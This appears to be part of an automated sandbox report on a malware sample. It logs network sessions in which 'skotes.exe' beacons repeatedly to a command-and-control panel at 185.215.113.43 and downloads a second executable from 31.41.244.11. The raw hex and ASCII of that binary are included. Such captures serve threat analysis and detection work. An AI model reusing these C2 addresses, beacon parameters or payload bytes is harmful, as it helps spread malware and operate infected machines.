                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:25.003170013 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:22:24 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          45192.168.2.450055185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:28.287251949 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:29.633793116 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:22:29 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          46192.168.2.450064185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:31.419161081 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:32.743643999 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:22:32 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          47192.168.2.450072185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:34.581392050 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:35.917315960 CET299INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:22:35 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 36 64 0d 0a 20 3c 63 3e 31 30 31 37 36 33 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 39 36 61 38 30 35 31 34 35 62 30 30 32 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 6d <c>1017630001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#<d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          48192.168.2.45007631.41.244.11806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:36.050122023 CET62OUTGET /files/burpin1/random.exe HTTP/1.1
                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:37.395791054 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:22:37 GMT
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          Content-Length: 4438776
                                                                                                                                                                                                                                                          Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          ETag: "675784f0-43baf8"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:37.395837069 CET224INData Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1
                                                                                                                                                                                                                                                          Data Ascii: jZQ39FY~9F~fAfG@;F|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A|At>E;Ew6rE;Es,j*P*YYtlAj@ AEPjh5XAA3
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:37.395878077 CET1236INData Raw: c9 c2 0c 00 8b 44 24 08 85 c0 74 0c a3 6c e9 41 00 b8 05 40 00 80 eb 3a 56 8b 74 24 08 57 8d 7e 24 83 3f 00 74 0f 8b 4e 20 8d 46 34 50 83 c1 08 e8 c0 11 01 00 8b cf e8 da 29 01 00 83 7e 1c 00 74 0c ff 76 40 ff 76 28 ff 15 80 a1 41 00 5f 33 c0 5e
                                                                                                                                                                                                                                                          Data Ascii: D$tlA@:Vt$W~$?tN F4P)~tv@v(A_3^UVuA}juuv(j}iuv(jjuVP^]=AtjA=XAtL$AVQ3=lAQjjPR=Atj5XAA^L$
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:37.395919085 CET1236INData Raw: 8b 76 0c 85 f6 59 74 06 8b 06 56 ff 50 08 5e c3 83 6c 24 04 04 e9 76 ff ff ff 56 6a 01 8b f1 e8 d3 fc ff ff 8b 46 04 8b 0e 66 8b 54 24 08 66 89 14 41 ff 46 04 8b 46 04 8b 0e 66 83 24 41 00 8b c6 5e c2 04 00 55 8b ec ff 75 0c 8b 4d 08 e8 03 fc ff
                                                                                                                                                                                                                                                          Data Ascii: vYtVP^l$vVjFfT$fAFFf$A^UuMuME]Vt$NFuhVrzY3^Uh$AuYYtEMPQ3hAu{YYu@]L$IAujP3VNXAD
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:37.395936012 CET1236INData Raw: 8d 55 d4 0f 95 c0 52 6a 0c ff 75 0c 89 46 3c 8b 46 0c 8b 08 50 ff 51 18 3b c7 89 45 0c 74 19 8d 4d d4 e8 fe 08 01 00 ff 75 f0 e8 ec 75 01 00 8b 7d 0c 59 e9 cf fe ff ff 0f b7 45 d4 3b c7 74 1a 83 f8 40 74 07 6a 66 e9 71 ff ff ff 8b 45 dc 89 46 34
                                                                                                                                                                                                                                                          Data Ascii: URjuF<FPQ;EtMuu}YE;t@tjfqEF4EF8EPAF4PEPA9~<t3Y>jh/N4QPYY%jlu;YtxXAH3PMF (F jQHxx,
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:37.396193027 CET672INData Raw: 64 a1 41 00 eb 7a 83 3d 90 e9 41 00 00 75 6f 8b 35 68 a1 41 00 68 d0 a5 41 00 bb c4 a5 41 00 53 c7 05 90 e9 41 00 01 00 00 00 ff d6 8b 3d 6c a1 41 00 50 ff d7 6a 00 89 45 fc 0f b7 05 80 e9 41 00 68 09 04 00 00 6a 00 50 8d 45 bc 68 a8 a5 41 00 50
                                                                                                                                                                                                                                                          Data Ascii: dAz=Auo5hAhAASA=lAPjEAhjPEhAPA}uhASPEtjEPjU3_^[U,SVW3WAjXPE0A}j`X5TAj`jdPv|=j[j=j[j_EPju@AWSuW
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:37.396245003 CET1236INData Raw: 50 ff 51 0c 39 75 fc 74 3f ff 75 fc e8 d4 fd ff ff 59 8d 4d d8 51 6a 18 50 89 45 fc ff 15 40 a0 41 00 6a 06 ff 75 e0 ff 75 dc 56 56 56 ff 75 08 ff 15 84 a2 41 00 ff 75 fc 56 68 72 01 00 00 ff 75 08 ff 15 b8 a2 41 00 8b 45 f0 8b 08 50 ff 51 08 33
                                                                                                                                                                                                                                                          Data Ascii: PQ9ut?uYMQjPE@AjuuVVVuAuVhruAEPQ3@WPA3_^[f=AuD<AfAAfft@Af=uDAA;ufAAUSV339AtAM9tFA9u9
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:37.396264076 CET224INData Raw: 5b c2 04 00 8b 01 8b 51 04 8b 4c 24 08 2b d1 8d 54 12 02 8d 0c 48 52 51 8b 4c 24 0c 8d 04 48 50 ff 15 3c a2 41 00 83 c4 0c c2 08 00 53 56 57 eb 3b 8b 02 8b 39 8a 1c 07 8a c3 e8 db f5 ff ff 84 c0 75 27 80 fb 3b 75 2d 3b fe 7d 12 8b 01 8b 32 80 3c
                                                                                                                                                                                                                                                          Data Ascii: [QL$+THRQL$HP<ASVW;9u';u-;}2<0t@;B|2_^[Ar91|S\$VWu33|$Gt$P$AtF;w|3_^[t3GVt$W39~~(Ft$P$A
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:37.396276951 CET1236INData Raw: 00 85 c0 75 0b 8b 06 6a 01 57 8b ce ff 50 04 4f 47 3b 7e 08 7c d8 5f 5e c3 56 8b f1 ff 76 0c e8 cf 68 01 00 ff 36 e8 c8 68 01 00 59 59 5e c3 ff 74 24 0c ff 74 24 0c ff 74 24 0c e8 59 ff ff ff 83 c4 0c 85 c0 74 04 8b 40 0c c3 33 c0 c3 55 8b ec 83
                                                                                                                                                                                                                                                          Data Ascii: ujWPOG;~|_^Vvh6hYY^t$t$t$Yt@3U@}u3AE@uEEP At7M3;w.rE;Es$j+pPkYYtAA3@t$Yujht$jAt$jYu%8AV
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:37.396317005 CET224INData Raw: ff 75 08 53 ff 75 10 ff 15 18 a1 41 00 8b 0e 88 1c 08 89 46 04 5f 8b c6 5e 5b 5d c3 55 8b ec 83 ec 0c 8d 4d f4 e8 76 e6 ff ff 83 7d fc 01 7f 0a 6a 01 8d 4d f4 e8 32 e3 ff ff 56 8b 35 14 a1 41 00 57 8b 7d 08 8b 07 6a 01 ff 75 f4 50 ff d6 85 c0 75
                                                                                                                                                                                                                                                          Data Ascii: uSuAF_^[]UMv}jM2V5AW}juPuucY7S@PPMPSuVf$FYEEPdVcY[_^U cSVW}3SSSSWPEu50AXuEE3]]
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:37.515628099 CET1236INData Raw: 89 5d f0 eb 03 8b 7d 08 8b 07 8d 4d e4 51 b9 00 10 00 00 2b ce 51 8d 8c 35 e0 ef ff ff 51 57 ff 50 0c 85 c0 0f 85 ca 00 00 00 8b 45 e4 3b c3 0f 84 bf 00 00 00 03 f0 8d 85 e0 ef ff ff 33 ff 89 45 f8 38 5d ff 8b c6 74 3d 2b 45 e8 3b f8 77 60 ff 75
                                                                                                                                                                                                                                                          Data Ascii: ]}MQ+Q5QWPE;3E8]t=+E;w`uuubE:EtuMvGE+E;w#uuubuEEE+}V=]PP<A9]w}"M39Y


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          49192.168.2.450106185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:47.415298939 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 37 36 33 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                          Data Ascii: d1=1017630001&unit=246122658369
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:48.754425049 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:22:48 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          50192.168.2.450113185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:50.539937973 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:52.002587080 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:22:51 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          51192.168.2.450119185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:53.660300016 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:55.029716015 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:22:54 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          52192.168.2.450122185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:56.919172049 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:58.266460896 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:22:58 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          53192.168.2.450123185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:59.900856018 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:01.238830090 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:01 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          54192.168.2.450125185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:02.995832920 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:04.356851101 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:04 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          55192.168.2.450127185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:06.079463959 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
